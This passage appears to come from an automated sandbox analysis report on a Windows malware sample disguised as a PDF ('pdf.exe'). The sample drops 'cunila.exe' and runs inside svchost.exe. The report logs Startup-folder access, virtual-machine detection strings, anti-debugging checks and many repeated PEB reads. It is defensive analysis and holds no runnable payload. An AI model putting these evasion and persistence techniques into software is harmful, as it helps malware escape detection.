                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 1_2_00D31F94
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0035DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_0035DDC0
                    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
                    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
                    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
                    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                    Source: wscript.exe, 00000003.00000002.1965343088.000002658DAC5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: wscript.exe, 00000003.00000002.1965343088.000002658DAC5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}|I
                    Source: cunila.exe, 00000004.00000003.1965298484.00000000019D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareworkstation.exe4M
                    Source: cunila.exe, 00000001.00000003.1840821630.0000000001471000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareworkstation.exe
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.0000000002862000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3083332902.00000000011BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: firefox.exe, 0000000D.00000002.2629190174.00000254BCB4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | API call chain: ExitProcess graph end node | graph_0-92917
                    Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                    Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Process queried: DebugPort
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E rdtsc | 2_2_0327096E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417DD3 LdrLoadDll, | 2_2_00417DD3
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00396AAF BlockInput, | 0_2_00396AAF
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00343D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00343D19
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00373920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, | 0_2_00373920
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0035E01E LoadLibraryA,GetProcAddress, | 0_2_0035E01E
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00CEE688 mov eax, dword ptr fs:[00000030h] | 0_2_00CEE688
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00CEE628 mov eax, dword ptr fs:[00000030h] | 0_2_00CEE628
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00CECFD8 mov eax, dword ptr fs:[00000030h] | 0_2_00CECFD8
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_0147F240 mov eax, dword ptr fs:[00000030h] | 1_2_0147F240
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_0147F2A0 mov eax, dword ptr fs:[00000030h] | 1_2_0147F2A0
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_0147DBF0 mov eax, dword ptr fs:[00000030h] | 1_2_0147DBF0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03308324 mov eax, dword ptr fs:[00000030h] | 2_2_03308324
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03308324 mov ecx, dword ptr fs:[00000030h] | 2_2_03308324
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03308324 mov eax, dword ptr fs:[00000030h] | 2_2_03308324
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03308324 mov eax, dword ptr fs:[00000030h] | 2_2_03308324
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] | 2_2_0326A30B
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] | 2_2_0326A30B
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] | 2_2_0326A30B
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h] | 2_2_0322C310
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h] | 2_2_03250310
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h] | 2_2_032D437C
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] | 2_2_032B2349
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] | 2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] | 2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] | 2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h] | 2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] | 2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] | 2_2_032B035C
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h] | 2_2_032FA352
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h] | 2_2_032D8350
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0330634F mov eax, dword ptr fs:[00000030h] | 2_2_0330634F
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] | 2_2_0322E388
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] | 2_2_0322E388
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] | 2_2_0322E388
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h] | 2_2_0325438F
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h] | 2_2_0325438F
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] | 2_2_03228397
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] | 2_2_03228397
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] | 2_2_03228397
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] | 2_2_032403E9
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0324E3F0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0324E3F0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_0324E3F0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h] | 2_2_032663FF
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h] | 2_2_032EC3CD
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] | 2_2_032383C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] | 2_2_032383C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] | 2_2_032383C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] | 2_2_032383C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h] | 2_2_032B63C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_032DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_032DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h] | 2_2_032DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h] | 2_2_032DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h] | 2_2_032D43D4
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h] | 2_2_032D43D4
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h] | 2_2_0322823B
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] | 2_2_03234260
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] | 2_2_03234260
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] | 2_2_03234260
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h] | 2_2_0322826B
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] | 2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h] | 2_2_032B8243
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h] | 2_2_032B8243
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0330625D mov eax, dword ptr fs:[00000030h] | 2_2_0330625D
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h] | 2_2_0322A250
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h] | 2_2_03236259
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h] | 2_2_032EA250
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h] | 2_2_032EA250
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h] | 2_2_032402A0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h] | 2_2_032402A0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h] | 2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h] | 2_2_0326E284
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h] | 2_2_0326E284
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] | 2_2_032B0283
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] | 2_2_032B0283
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] | 2_2_032B0283
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] | 2_2_032402E1
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] | 2_2_032402E1
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] | 2_2_032402E1
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0323A2C3
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0323A2C3
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0323A2C3
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0323A2C3
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 2_2_0323A2C3
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_033062D6 mov eax, dword ptr fs:[00000030h] | 2_2_033062D6
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h] | 2_2_03260124
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] | 2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h] | 2_2_032DA118
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h] | 2_2_032DA118
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h] | 2_2_032DA118
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h] | 2_2_032DA118
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h] | 2_2_032F0115
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03304164 mov eax, dword ptr fs:[00000030h] | 2_2_03304164
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03304164 mov eax, dword ptr fs:[00000030h] | 2_2_03304164
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] | 2_2_032C4144
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] | 2_2_032C4144
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h] | 2_2_032C4144
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] | 2_2_032C4144
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] | 2_2_032C4144
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h] | 2_2_0322C156
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h] | 2_2_032C8158
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h] | 2_2_03236154
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h] | 2_2_03236154
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03270185 mov eax, dword ptr fs:[00000030h] | 2_2_03270185
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h] | 2_2_032EC188
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h] | 2_2_032EC188
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h] | 2_2_032D4180
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h] | 2_2_032D4180
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] | 2_2_032B019F
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] | 2_2_032B019F
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] | 2_2_032B019F
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] | 2_2_032B019F
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h] | 2_2_0322A197
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h] | 2_2_0322A197
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h] | 2_2_0322A197
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h] | 2_2_033061E5
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h] | 2_2_032601F8
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h] | 2_2_032F61C3
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h] | 2_2_032F61C3
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_032AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_032AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h] | 2_2_032AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_032AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_032AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h] | 2_2_0322A020
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h] | 2_2_0322C020
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h] | 2_2_032C6030
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h] | 2_2_032B4000
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] | 2_2_032D2000
